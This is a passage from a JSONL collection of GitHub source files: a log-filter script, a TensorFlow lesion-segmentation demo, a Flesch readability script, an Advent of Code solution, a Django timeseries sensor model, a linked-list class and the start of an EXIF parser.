log_latency_st, log_latency_ed):\n                line_buffer += line\n                st_md_start = 1\n            continue\n        # the SQL may span multiple lines, so only the metadata line is filtered\n        if st_md_start == 1 or st_sl_start == 1:\n            line_buffer += \" \"\n            line_buffer += line\n            st_md_start = 0\n            st_sl_start = 1\n    if not line_buffer.strip() == \"\":\n        line_buffer = re.sub(r' +', ' ', line_buffer)\n        if filter_sql(line_buffer, log_sql):\n            wfp.write(line_buffer + \"\\n\")\n    rfp.close()\nwfp.close()\n\n","repo_name":"tsthght/scripts","sub_path":"filter-log.py","file_name":"filter-log.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9191604390","text":"## Deep Active Lesion Segmentation (DALS), Code by Ali Hatamizadeh ( http://web.cs.ucla.edu/~ahatamiz/ )\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import f1_score\nfrom utils import load_image,my_func,resolve_status,contoured_image\nimport matplotlib.pyplot as plt\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--logdir', default='network_lung', type=str)\nparser.add_argument('--mu', default=0.2, type=float)\nparser.add_argument('--nu', default=5.0, type=float)\nparser.add_argument('--batch_size', default=1, type=int)\nparser.add_argument('--train_sum_freq', default=150, type=int)\nparser.add_argument('--train_iter', default=150000, type=int)\nparser.add_argument('--acm_iter_limit', default=300, type=int)\nparser.add_argument('--img_resize', default=512, type=int)\nparser.add_argument('--f_size', default=15, type=int)\nparser.add_argument('--train_status', default=1, type=int)\nparser.add_argument('--narrow_band_width', default=1, type=int)\nparser.add_argument('--save_freq', default=1000, type=int)\nparser.add_argument('--lr', default=1e-3, type=float)\nparser.add_argument('--gpu', default='0', type=str)\nargs = parser.parse_args()\nrestore,is_training =resolve_status(args.train_status)\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.gpu\n\n\n###### Demo 1 # Brain\nimage_add = './dataset/demo_brain/img1_input.npy'\nlabel_add = 
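# --- Editor's aside on the log-filter script that concluded just above (illustrative):
# the three-way branch in filter_time is easy to get wrong, so here is a compact
# standalone restatement of the same predicate, where 0 means "unbounded" on that side,
# with two sanity checks on hypothetical timestamps.
import time

def in_window(cur_t, start_t, end_t):
    if start_t and cur_t < start_t:
        return False
    if end_t and cur_t > end_t:
        return False
    return True

_t = lambda s: time.mktime(time.strptime(s, "%Y-%m-%d %H:%M:%S"))
assert in_window(_t("2020-01-01 12:00:00"), 0, _t("2020-01-02 00:00:00"))
assert not in_window(_t("2020-01-03 12:00:00"), 0, _t("2020-01-02 00:00:00"))
# --- end of aside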
'./dataset/demo_brain/img1_label.npy'\ninit_seg_add = './dataset/demo_brain/img1_initseg.npy'\n\n\ndef re_init_phi(phi, dt):\n    D_left_shift = tf.cast(tf.manip.roll(phi, -1, axis=1), dtype='float32')\n    D_right_shift = tf.cast(tf.manip.roll(phi, 1, axis=1), dtype='float32')\n    D_up_shift = tf.cast(tf.manip.roll(phi, -1, axis=0), dtype='float32')\n    D_down_shift = tf.cast(tf.manip.roll(phi, 1, axis=0), dtype='float32')\n    bp = D_left_shift - phi\n    cp = phi - D_down_shift\n    dp = D_up_shift - phi\n    ap = phi - D_right_shift\n    an = tf.identity(ap)\n    bn = tf.identity(bp)\n    cn = tf.identity(cp)\n    dn = tf.identity(dp)\n    # one-sided clips; 1e38 serves as an effectively infinite bound (Python's ^ is bitwise XOR, not power)\n    ap = tf.clip_by_value(ap, 0, 1e38)\n    bp = tf.clip_by_value(bp, 0, 1e38)\n    cp = tf.clip_by_value(cp, 0, 1e38)\n    dp = tf.clip_by_value(dp, 0, 1e38)\n    an = tf.clip_by_value(an, -1e38, 0)\n    bn = tf.clip_by_value(bn, -1e38, 0)\n    cn = tf.clip_by_value(cn, -1e38, 0)\n    dn = tf.clip_by_value(dn, -1e38, 0)\n    area_pos = tf.where(phi > 0)\n    area_neg = tf.where(phi < 0)\n    pos_y = area_pos[:, 0]\n    pos_x = area_pos[:, 1]\n    neg_y = area_neg[:, 0]\n    neg_x = area_neg[:, 1]\n    tmp1 = tf.reduce_max([tf.square(tf.gather_nd(t, area_pos)) for t in [ap, bn]], axis=0)\n    tmp1 += tf.reduce_max([tf.square(tf.gather_nd(t, area_pos)) for t in [cp, dn]], axis=0)\n    update1 = tf.sqrt(tf.abs(tmp1)) - 1\n    indices1 = tf.stack([pos_y, pos_x], 1)\n    tmp2 = tf.reduce_max([tf.square(tf.gather_nd(t, area_neg)) for t in [an, bp]], axis=0)\n    tmp2 += tf.reduce_max([tf.square(tf.gather_nd(t, area_neg)) for t in [cn, dp]], axis=0)\n    update2 = tf.sqrt(tf.abs(tmp2)) - 1\n    indices2 = tf.stack([neg_y, neg_x], 1)\n    indices_final = tf.concat([indices1, indices2], 0)\n    update_final = tf.concat([update1, update2], 0)\n    dD = tf.scatter_nd(indices_final, update_final, shape=[input_image_size, input_image_size])\n    S = tf.divide(phi, tf.square(phi) + 1)\n    phi = phi - tf.multiply(dt * S, dD)\n\n    return phi\n\n\ndef get_curvature(phi, x, y):\n    phi_shape = tf.shape(phi)\n    dim_y = phi_shape[0]\n    dim_x = phi_shape[1]\n    x = tf.cast(x, dtype=\"int32\")\n    y = tf.cast(y, dtype=\"int32\")\n    y_plus = tf.cast(y + 1, dtype=\"int32\")\n    y_minus = tf.cast(y - 1, dtype=\"int32\")\n    x_plus = tf.cast(x + 1, dtype=\"int32\")\n    x_minus = tf.cast(x - 1, dtype=\"int32\")\n    y_plus = tf.minimum(tf.cast(y_plus, dtype=\"int32\"), tf.cast(dim_y - 1, dtype=\"int32\"))\n    x_plus = tf.minimum(tf.cast(x_plus, dtype=\"int32\"), tf.cast(dim_x - 1, dtype=\"int32\"))\n    y_minus = tf.maximum(y_minus, 0)\n    x_minus = tf.maximum(x_minus, 0)\n    d_phi_dx = tf.gather_nd(phi, tf.stack([y, x_plus], 1)) - tf.gather_nd(phi, tf.stack([y, x_minus], 1))\n    d_phi_dx_2 = tf.square(d_phi_dx)\n    d_phi_dy = tf.gather_nd(phi, tf.stack([y_plus, x], 1)) - tf.gather_nd(phi, tf.stack([y_minus, x], 1))\n    d_phi_dy_2 = tf.square(d_phi_dy)\n    d_phi_dxx = tf.gather_nd(phi, tf.stack([y, x_plus], 1)) + tf.gather_nd(phi, tf.stack([y, x_minus], 1)) - \\\n                2 * tf.gather_nd(phi, tf.stack([y, x], 1))\n    d_phi_dyy = tf.gather_nd(phi, tf.stack([y_plus, x], 1)) + tf.gather_nd(phi, tf.stack([y_minus, x], 1)) - \\\n                2 * tf.gather_nd(phi, tf.stack([y, x], 1))\n    d_phi_dxy = 0.25 * (- tf.gather_nd(phi, tf.stack([y_minus, x_minus], 1)) - tf.gather_nd(phi, tf.stack(\n        [y_plus, x_plus], 1)) + tf.gather_nd(phi, tf.stack([y_minus, x_plus], 1)) + tf.gather_nd(phi, tf.stack(\n        [y_plus, x_minus], 1)))\n    tmp_1 = tf.multiply(d_phi_dx_2, d_phi_dyy) + tf.multiply(d_phi_dy_2, d_phi_dxx) - \\\n            2 * tf.multiply(tf.multiply(d_phi_dx, d_phi_dy), d_phi_dxy)\n    tmp_2 = tf.add(tf.pow(d_phi_dx_2 + d_phi_dy_2, 1.5), 
2.220446049250313e-16)\n tmp_3 = tf.pow(d_phi_dx_2 + d_phi_dy_2, 0.5)\n tmp_4 = tf.divide(tmp_1, tmp_2)\n curvature = tf.multiply(tmp_3, tmp_4)\n mean_grad = tf.pow(d_phi_dx_2 + d_phi_dy_2, 0.5)\n\n return curvature, mean_grad\n\n\ndef get_intensity(image, masked_phi, filter_patch_size=5):\n u_1 = tf.layers.average_pooling2d(tf.multiply(image, masked_phi), [filter_patch_size, filter_patch_size], 1,padding='SAME')\n u_2 = tf.layers.average_pooling2d(masked_phi, [filter_patch_size, filter_patch_size], 1, padding='SAME')\n u_2_prime = 1 - tf.cast((u_2 > 0), dtype='float32') + tf.cast((u_2 < 0), dtype='float32')\n u_2 = u_2 + u_2_prime + 2.220446049250313e-16\n\n return tf.divide(u_1, u_2)\n\n\ndef active_contour_layer(elems):\n img = elems[0]\n init_phi = elems[1]\n map_lambda1_acl = elems[2]\n map_lambda2_acl = elems[3]\n wind_coef = 3\n zero_tensor = tf.constant(0, shape=[], dtype=\"int32\")\n def _body(i, phi_level):\n band_index = tf.reduce_all([phi_level <= narrow_band_width, phi_level >= -narrow_band_width], axis=0)\n band = tf.where(band_index)\n band_y = band[:, 0]\n band_x = band[:, 1]\n shape_y = tf.shape(band_y)\n num_band_pixel = shape_y[0]\n window_radii_x = tf.ones(num_band_pixel) * wind_coef\n window_radii_y = tf.ones(num_band_pixel) * wind_coef\n\n def body_intensity(j, mean_intensities_outer, mean_intensities_inner):\n ### This can be computationally expensive. Use with fewer number of acm iterations.\n xnew = tf.cast(band_x[j], dtype=\"float32\")\n ynew = tf.cast(band_y[j], dtype=\"float32\")\n window_radius_x = tf.cast(window_radii_x[j], dtype=\"float32\")\n window_radius_y = tf.cast(window_radii_y[j], dtype=\"float32\")\n local_window_x_min = tf.cast(tf.floor(xnew - window_radius_x), dtype=\"int32\")\n local_window_x_max = tf.cast(tf.floor(xnew + window_radius_x), dtype=\"int32\")\n local_window_y_min = tf.cast(tf.floor(ynew - window_radius_y), dtype=\"int32\")\n local_window_y_max = tf.cast(tf.floor(ynew + window_radius_y), dtype=\"int32\")\n local_window_x_min = tf.maximum(zero_tensor, local_window_x_min)\n local_window_y_min = tf.maximum(zero_tensor, local_window_y_min)\n local_window_x_max = tf.minimum(tf.cast(input_image_size - 1, dtype=\"int32\"), local_window_x_max)\n local_window_y_max = tf.minimum(tf.cast(input_image_size - 1, dtype=\"int32\"), local_window_y_max)\n local_image = img[local_window_y_min: local_window_y_max + 1,local_window_x_min: local_window_x_max + 1]\n local_phi = phi_prime[local_window_y_min: local_window_y_max + 1,local_window_x_min: local_window_x_max + 1]\n inner = tf.where(local_phi <= 0)\n area_inner = tf.cast(tf.shape(inner)[0], dtype='float32')\n outer = tf.where(local_phi > 0)\n area_outer = tf.cast(tf.shape(outer)[0], dtype='float32')\n image_loc_inner = tf.gather_nd(local_image, inner)\n image_loc_outer = tf.gather_nd(local_image, outer)\n mean_intensity_inner = tf.cast(tf.divide(tf.reduce_sum(image_loc_inner), area_inner), dtype='float32')\n mean_intensity_outer = tf.cast(tf.divide(tf.reduce_sum(image_loc_outer), area_outer), dtype='float32')\n mean_intensities_inner = tf.concat(axis=0, values=[mean_intensities_inner[:j], [mean_intensity_inner]])\n mean_intensities_outer = tf.concat(axis=0, values=[mean_intensities_outer[:j], [mean_intensity_outer]])\n\n return (j + 1, mean_intensities_outer, mean_intensities_inner)\n\n if fast_lookup:\n phi_4d = phi_level[tf.newaxis, :, :, tf.newaxis]\n image = img[tf.newaxis, :, :, tf.newaxis]\n band_index_2 = tf.reduce_all([phi_4d <= narrow_band_width, phi_4d >= -narrow_band_width], axis=0)\n 
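# --- Editor's aside (illustrative): get_intensity above computes *local* region means
# with average pooling. The global Chan-Vese region means it generalizes are simply
# masked averages; a standalone NumPy restatement with hypothetical inputs:
import numpy as np

demo_img = np.random.rand(64, 64).astype(np.float32)   # hypothetical image
demo_phi = np.random.randn(64, 64).astype(np.float32)  # hypothetical level set

c_inside = demo_img[demo_phi <= 0].mean()   # mean intensity inside the contour
c_outside = demo_img[demo_phi > 0].mean()   # mean intensity outside the contour
# --- end of aside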
band_2 = tf.where(band_index_2)\n u_inner = get_intensity(image, tf.cast((([phi_4d <= 0])), dtype='float32')[0], filter_patch_size=f_size)\n u_outer = get_intensity(image, tf.cast((([phi_4d > 0])), dtype='float32')[0], filter_patch_size=f_size)\n mean_intensities_inner = tf.gather_nd(u_inner, band_2)\n mean_intensities_outer = tf.gather_nd(u_outer, band_2)\n\n else:\n mean_intensities_inner = tf.constant([0], dtype='float32')\n mean_intensities_outer = tf.constant([0], dtype='float32')\n j = tf.constant(0, dtype=tf.int32)\n _, mean_intensities_outer, mean_intensities_inner = tf.while_loop(\n lambda j, mean_intensities_outer, mean_intensities_inner:\n j < num_band_pixel, body_intensity, loop_vars=[j, mean_intensities_outer, mean_intensities_inner],\n shape_invariants=[j.get_shape(), tf.TensorShape([None]), tf.TensorShape([None])])\n\n lambda1 = tf.gather_nd(map_lambda1_acl, [band])\n lambda2 = tf.gather_nd(map_lambda2_acl, [band])\n curvature, mean_grad = get_curvature(phi_level, band_x, band_y)\n kappa = tf.multiply(curvature, mean_grad)\n term1 = tf.multiply(tf.cast(lambda1, dtype='float32'),tf.square(tf.gather_nd(img, [band]) - mean_intensities_inner))\n term2 = tf.multiply(tf.cast(lambda2, dtype='float32'),tf.square(tf.gather_nd(img, [band]) - mean_intensities_outer))\n force = -nu + term1 - term2\n force /= (tf.reduce_max(tf.abs(force)))\n d_phi_dt = tf.cast(force, dtype=\"float32\") + tf.cast(mu * kappa, dtype=\"float32\")\n dt = .45 / (tf.reduce_max(tf.abs(d_phi_dt)) + 2.220446049250313e-16)\n d_phi = dt * d_phi_dt\n update_narrow_band = d_phi\n phi_prime = phi_level + tf.scatter_nd([band], tf.cast(update_narrow_band, dtype='float32'),shape=[input_image_size, input_image_size])\n phi_prime = re_init_phi(phi_prime, 0.5)\n\n return (i + 1, phi_prime)\n\n i = tf.constant(0, dtype=tf.int32)\n phi = init_phi\n _, phi = tf.while_loop(lambda i, phi: i < iter_limit, _body, loop_vars=[i, phi])\n phi = tf.round(tf.cast((1 - tf.nn.sigmoid(phi)), dtype=tf.float32))\n\n return phi,init_phi, map_lambda1_acl, map_lambda2_acl\n\nfast_lookup = True\nconfig = tf.ConfigProto(allow_soft_placement=True)\ninput_shape = [args.batch_size, args.img_resize, args.img_resize, 1]\ninput_shape_dt = [args.batch_size, args.img_resize, args.img_resize]\niter_limit = args.acm_iter_limit\nnarrow_band_width = args.narrow_band_width\nmu = args.mu\nnu = args.nu\nf_size = args.f_size\ninput_image_size = args.img_resize\nx = tf.placeholder(shape=input_shape, dtype=tf.float32, name=\"x\")\ny = tf.placeholder(dtype=tf.float32, name=\"y\")\nout_seg = tf.placeholder(dtype=tf.float32, name=\"out_seg\")\nphase = tf.placeholder(tf.bool, name='phase')\nglobal_step = tf.Variable(0, name='global_step', trainable=False)\nmap_lambda1 = tf.exp(tf.divide(tf.subtract(2.0,out_seg),tf.add(1.0,out_seg)))\nmap_lambda2 = tf.exp(tf.divide(tf.add(1.0, out_seg), tf.subtract(2.0, out_seg)))\ny_out_dl = tf.round(out_seg)\nx_acm = x[:, :, :, 0]\nrounded_seg_acl = y_out_dl[:, :, :, 0]\ndt_trans = tf.py_func(my_func, [rounded_seg_acl], tf.float32)\ndt_trans.set_shape([args.batch_size, input_image_size, input_image_size])\nphi_out,_, lambda1_tr, lambda2_tr = tf.map_fn(fn=active_contour_layer, elems=(x_acm, dt_trans, map_lambda1[:, :, :, 0], map_lambda2[:, :, :, 0]))\nrounded_seg = tf.round(out_seg)\nwith tf.Session(config=config) as sess:\n\n print(\"########### Inference ############\")\n\n print('Brain Demo in Progress ... 
')\n    image = load_image(image_add,args.batch_size,False)\n    labels = load_image(label_add, args.batch_size,True)\n    init_seg = np.load(init_seg_add)\n    labels[labels != 0] = 1\n    seg_out_acm, seg_out = sess.run([phi_out, y_out_dl],{x: image, y: labels, out_seg: init_seg, phase: False})\n    seg_out = seg_out[0, :, :, 0]\n    seg_out_acm = seg_out_acm[0, :, :]\n    gt_mask = labels[0, :, :, 0]\n    f1 = f1_score(gt_mask, seg_out, labels=None, average='micro', sample_weight=None)\n    print('CNN Dice {0:0.4f}'.format(f1))\n    f2 = f1_score(gt_mask, seg_out_acm, labels=None, average='micro', sample_weight=None)\n    print('ACM Dice {0:0.4f}'.format(f2))\n    fig = plt.figure()\n    plt.subplot(1, 3, 1)\n    plt.title('DALS Output, Dice:{0:0.4f}'.format(f2))\n    seg_out_acm=contoured_image(seg_out_acm, image[0,:,:,0])\n    plt.imshow(seg_out_acm)\n    plt.subplot(1, 3, 2)\n    plt.title('CNN Output, Dice:{0:0.4f}'.format(f1))\n    seg_out = contoured_image(seg_out, image[0, :, :, 0])\n    plt.imshow(seg_out)\n    plt.subplot(1, 3, 3)\n    plt.title('Radiologist Annotation')\n    gt_mask = contoured_image(gt_mask, image[0, :, :, 0])\n    plt.imshow(gt_mask)\n    plt.show()\n\n\n\n\n","repo_name":"ahatamiz/dals","sub_path":"main_demo.py","file_name":"main_demo.py","file_ext":"py","file_size_in_byte":13809,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"37"} +{"seq_id":"70748922029","text":"import string\nimport datetime\nimport matplotlib.pyplot as plt\n\nnumLines = 0\nnumWords = 0\nnumSentences = 0\n\nnumVowels = 0\nvowels = 'aeiouy'\nlistNumSyllables = []\nwordList = []\n\nfilename = '/Users/dave/CIS/678/P1/mb.txt'\n\nwith open(filename, 'r') as file:\n    start_time = datetime.datetime.now()\n    for line in file:\n        line = line.replace(\"...\", \" \")\n        numSentences += line.count('.')\n        line = line.translate(None, string.punctuation)\n\n        for word in line.split():\n            silent = None\n            num_syllables = 0\n\n            if word.endswith('e'):\n                silent = True\n\n            for index, letter in enumerate(word):\n                if index == 0 and word[index] in vowels:\n                    num_syllables += 1\n                elif word[index - 1] not in vowels:\n                    if index < len(word) - 1 and word[index] in vowels:\n                        num_syllables += 1\n                    elif index == len(word) - 1 and word[index] in vowels:\n                        num_syllables += 1\n\n            if num_syllables > 1 and silent:\n                num_syllables -= 1\n\n            listNumSyllables.append(num_syllables)\n\n    total_time = datetime.datetime.now() - start_time\n    milli = int(total_time.total_seconds() * 1000)\n\ntotalSyllables = sum(listNumSyllables)\ntotalWords = len(listNumSyllables)\n\naws = totalWords / float(numSentences)  # words per sentence (average sentence length)\nasl = totalSyllables / float(totalWords)  # syllables per word\n\nfi = 206.835 - (1.015 * aws) - (84.6 * asl)\n\n# print('\\nAll Items for Histogram in: listNumSyllables')\n# print('Number of Sentences: %i' % numSentences)\n# print('Number of Words: %i' % len(listNumSyllables))\n# print('Number of Syllables: %i' % (sum(listNumSyllables)))\n# print('Average Number of Syllables Per Word %.2f' % asl)\n\nplt.hist(listNumSyllables)\nplt.title(\"Syllable Complexity - Moby Dick\")\nplt.xlabel(\"Number of Syllables\")\nplt.ylabel(\"Frequency\")\nplt.savefig('syllableFreq.png')\n\nprint('\\nFlesch Index: %.2f' % fi)\nprint('Execution Time: %i Milliseconds' % milli)\n\n\n","repo_name":"daverynties/Flesch-Index-Calculation","sub_path":"exploratoryAnalysis.py","file_name":"exploratoryAnalysis.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6135032778","text":"import string\r\n\r\nwith 
open('aoc_input3.1.txt') as file:\r\n ruck = [line.rstrip() for line in file]\r\n\r\n# Part 1\r\n\r\nlower_alphabet = list(string.ascii_lowercase)\r\nupper_alphabet = list(string.ascii_uppercase)\r\n\r\nalphabet = lower_alphabet + upper_alphabet\r\n\r\nalphabet_dict = {}\r\npriority = 1\r\nfor i in alphabet:\r\n alphabet_dict[i] = priority\r\n priority += 1\r\n\r\npriority_score = 0\r\n\r\nfor r in ruck:\r\n item_len = int(len(r)/2)\r\n r1 = set(r[0:item_len])\r\n r2 = set(r[item_len:])\r\n common_item = r1.intersection(r2)\r\n (element,) = common_item\r\n priority_score += alphabet_dict[element]\r\n\r\nprint(priority_score)\r\n\r\n# Part 2\r\n\r\nruck_group = []\r\nidx = 1\r\ntotal_len = int(len(ruck)/3)\r\ntemp_ruck = []\r\nfor r in ruck:\r\n temp_ruck.append(r)\r\n if idx % 3 == 0:\r\n ruck_group.append(temp_ruck)\r\n temp_ruck = []\r\n idx = 1\r\n else:\r\n idx += 1\r\n\r\nbadge_priority_score = 0\r\n\r\nfor rg in ruck_group:\r\n rg1 = set(rg[0])\r\n rg2 = set(rg[1])\r\n rg3 = set(rg[2])\r\n badge = rg1.intersection(rg2)\r\n common_badge = badge.intersection(rg3)\r\n # print(common_badge)\r\n (element,) = common_badge\r\n badge_priority_score += alphabet_dict[element]\r\n\r\nprint(badge_priority_score)\r\n","repo_name":"andyphua114/advent_of_code_2022","sub_path":"day_03/aoc_day3.py","file_name":"aoc_day3.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13897146069","text":"import logging\nfrom math import fmod\n\nimport django\nfrom django.conf import settings\nfrom django.db import models\n\nfrom zconnect.models import ModelBase\nfrom zconnect.util import exceptions\nfrom zconnect.zc_timeseries.util.tsaggregations import (\n AGGREGATION_CHOICES, GRAPH_CHOICES, aggregation_implementations)\n\nlogger = logging.getLogger(__name__)\n\n\n# Sentinel that just indicates that the data should be aggregated into one\n# point. This prevents 2 queries being done\nAGGREGATE_TO_ONE_VALUE = object()\n\n\nclass SensorType(ModelBase):\n \"\"\"A type of sensor\n\n Attributes:\n aggregation_type (str): Default aggregation to perform for this sensor\n type - eg 'avg', 'sum'\n descriptive_name (str): Longer description of sensor\n graph_type (str): What kind of graph this should be shown as in the app\n (bar or graph)\n product (Product): which product this sensor is associated with\n sensor_name (str): name of sensor\n unit (str): Unit of measurement (eg, \"Watts\")\n \"\"\"\n\n # The canonical name for this sensor\n sensor_name = models.CharField(max_length=50, blank=True)\n\n # A human readable sensor name, could be displayed under graphs etc.\n descriptive_name = models.CharField(max_length=50, blank=True)\n unit = models.CharField(max_length=30)\n graph_type = models.CharField(max_length=20, choices=GRAPH_CHOICES, default=\"ts_graph\")\n aggregation_type = models.CharField(max_length=20, choices=AGGREGATION_CHOICES, default=\"sum\")\n # products can't be deleted until all devices are deleted as well. 
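# --- Editor's aside on the Advent of Code solution above (illustrative): the manual
# idx/temp_ruck grouping can be expressed with slice-zipping, and the priority table
# with str.index. Functionally equivalent to Part 2 above:
import string

letters = string.ascii_lowercase + string.ascii_uppercase

def badge_priority_sum(lines):
    total = 0
    for a, b, c in zip(lines[::3], lines[1::3], lines[2::3]):
        (badge,) = set(a) & set(b) & set(c)   # the single item common to all three
        total += letters.index(badge) + 1
    return total
# --- end of aside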
Once we\n # can delete it, all sensor types are a bit pointless to keep, so delete\n # them instead.\n product = models.ForeignKey(\"zconnect.Product\", models.CASCADE, related_name=\"sensors\", blank=False)\n\n class Meta:\n unique_together = [\"sensor_name\", \"product\"]\n\n\nclass DeviceSensor(ModelBase):\n \"\"\"A sensor associated with a device\n\n Attributes:\n device (Device): associated device\n resolution (float): how often this is sampled, in seconds\n sensor_type (SensorType): type of sensor\n \"\"\"\n\n resolution = models.FloatField(default=120.0)\n # If device goes, just delete this. device should never be deleted really\n # though\n device = models.ForeignKey(settings.ZCONNECT_DEVICE_MODEL, models.CASCADE, related_name=\"sensors\", blank=False)\n # Can't leave the sensor type null\n sensor_type = models.ForeignKey(SensorType, models.PROTECT, blank=False)\n\n class Meta:\n # NOTE\n # This seems to make sense but it would break in the case that a device\n # has multiple of the same sensor.\n unique_together = (\"device\", \"sensor_type\")\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device\n\n The latest_ts_data_optimised on AbstractDevice should be used instead of\n directly calling this\n \"\"\"\n\n from .timeseriesdata import TimeSeriesData\n\n try:\n data = TimeSeriesData.objects.filter(\n sensor=self,\n ).latest(\"ts\")\n except TimeSeriesData.DoesNotExist:\n # If the device hasn't made any timeseries data yet.\n return {}\n\n return data\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings\n of arguments.\n\n Raises:\n TimeSeriesData.DoesNotExist: If there is no data in the given period\n \"\"\"\n from .timeseriesdata import TimeSeriesData\n\n # Multiple of resolution\n # We extract just the values_list here because doing it in a\n # separate statement results in django querying the database\n # twice...\n raw = TimeSeriesData.objects.filter(\n ts__gte=data_start,\n ts__lt=data_end,\n sensor=self,\n ).values_list(\"value\", \"ts\")\n\n if not raw:\n # This should raise above but for some reason it doesn't when using\n # values_list\n raise TimeSeriesData.DoesNotExist\n\n # How many samples we would expect if there was no missing data\n expected_samples = (data_end - data_start).total_seconds()/self.resolution\n\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n # Already checked that this divides nicely\n # NOTE\n # should aggregation_factor ALWAYS be expected_samples?\n aggregation_factor = int(resolution//self.resolution)\n\n logger.debug(\"%s objects to aggregate\", len(raw))\n\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n\n logger.debug(\"Aggregating '%s' with %s, factor %s\",\n aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE,\n aggregation_factor)\n\n data = aggregation_engine(\n raw,\n aggregation_type,\n aggregation_factor,\n expected_samples,\n data_start,\n data_end,\n self,\n )\n\n return data\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it\n\n See Device.optimised_data_fetch for args\n\n This function assumes all the input data is already validated.\n \"\"\"\n\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError(\"Resolution should be a multiple of {} (was {})\".format(\n 
self.resolution, resolution))\n\n from .timeseriesdata import TimeSeriesData\n\n # XXX\n # equals for floats? If resolution is not a whole number this won't work\n if resolution == self.resolution:\n # No aggregation, just get the data\n # It's already sorted by time in the database\n data = TimeSeriesData.objects.filter(\n sensor=self,\n ts__gte=data_start,\n ts__lt=data_end,\n )\n else:\n data = self._get_aggregated_data(\n data_start,\n data_end,\n resolution,\n self.sensor_type.aggregation_type,\n )\n\n return data\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates\n\n This does it like ``[data_start, data_end)`` - including start, not end\n\n If delete is True, also delete the old ts data.\n\n Args:\n data_start (datetime): start of archive\n data_end (datetime): end of archives\n\n Keyword args:\n delete (bool, optional): delete old ts data if True\n aggregation_type (str, optional): If this is passed then it will use\n that aggregation type rather than the 'default' on the sensor\n type. This has to be one of\n zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will\n raise an error. Note that some of these choices may be\n meaningless for certain data types (eg, sum of temperatures over\n a month is a bit useless)\n\n Returns:\n TimeSeriesDataArchive: archive of data between data_start and data_end\n\n Raises:\n TimeSeriesData.DoesNotExist: If there is no data between data_start and\n data_end\n \"\"\"\n\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n\n data = self._get_aggregated_data(\n data_start,\n data_end,\n AGGREGATE_TO_ONE_VALUE,\n aggregation_type,\n )\n\n logger.debug(\"to archive: %s\", data)\n\n archived = TimeSeriesDataArchive(\n start=data_start,\n end=data_end,\n value=data[0].value,\n sensor=self,\n aggregation_type=aggregation_type,\n )\n archived.save()\n\n logger.debug(\"archived %s to %s with %s: %s\", archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n\n if delete:\n TimeSeriesData.objects.filter(\n sensor=self,\n ts__gte=data_start,\n ts__lt=data_end,\n ).delete()\n\n return archived\n","repo_name":"zconnect-iot/zconnect-django","sub_path":"zconnect/zc_timeseries/_models/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":8729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42990155114","text":"class Node:\n def __init__(self,val):\n self.val=val\n self.next=None\n\n\nclass linkedList:\n def __init__(self):\n self.head=None\n\n def printNode(self):\n while self.head!=None:\n print(self.head.val)\n self.head=self.head.next\n def insertHead(self,node):\n node.next=self.head\n self.head=node\n def insertAtIndex(self,i,node):\n if i==0:\n self.insertHead(node)\n else:\n cur=self.head\n for k in range(0,i-1):\n cur=cur.next\n if cur==None: return\n node.next=cur.next\n cur.next=node\n\n def deleteHead(self,):\n if self.head==None: return\n self.head=self.head.next\n\n def deleteAtIndex(self,i):\n if i==0:\n self.deleteHead()\n else:\n cur=self.head\n for i in range(0,i-1):\n cur=cur.next\n if cur==None: return\n if cur.next==None: return\n 
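# --- Editor's aside (illustrative): printNode in the linked-list class above walks the
# list by reassigning self.head, which empties the list as a side effect of printing
# it. A non-destructive traversal uses a local cursor instead:
def print_nodes(linked_list):
    cur = linked_list.head
    while cur is not None:
        print(cur.val)
        cur = cur.next
# --- end of aside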
cur.next=cur.next.next\n\ndef nodeTest():\n    myList=linkedList()\n    myList.insertHead(Node(1))\n    myList.insertAtIndex(1,Node(2))\n    #myList.deleteHead()\n    myList.deleteAtIndex(1)\n    myList.printNode()\n\nif __name__ == '__main__':\n    nodeTest()","repo_name":"jzhengcse/data_structures","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38123697634","text":"import exifread\nimport datetime\nimport base64\n\ndef parse_timestamp(metadata, date, subsec):\n    try:\n        value = '{}.{}'.format(metadata[date], metadata.get(subsec, 0))\n        return datetime.datetime.strptime(value, '%Y:%m:%d %H:%M:%S.%f')\n    except (ValueError, KeyError):\n        return None\n\ndef parse(path):\n    with open(path, 'rb') as fd:\n        raw = {}\n        for key, value in exifread.process_file(fd).items():\n            if type(value) == bytes:\n                raw[key] = base64.b64encode(value).decode('utf-8')\n            else:\n                raw[key] = str(value)\n\n    time = (\n        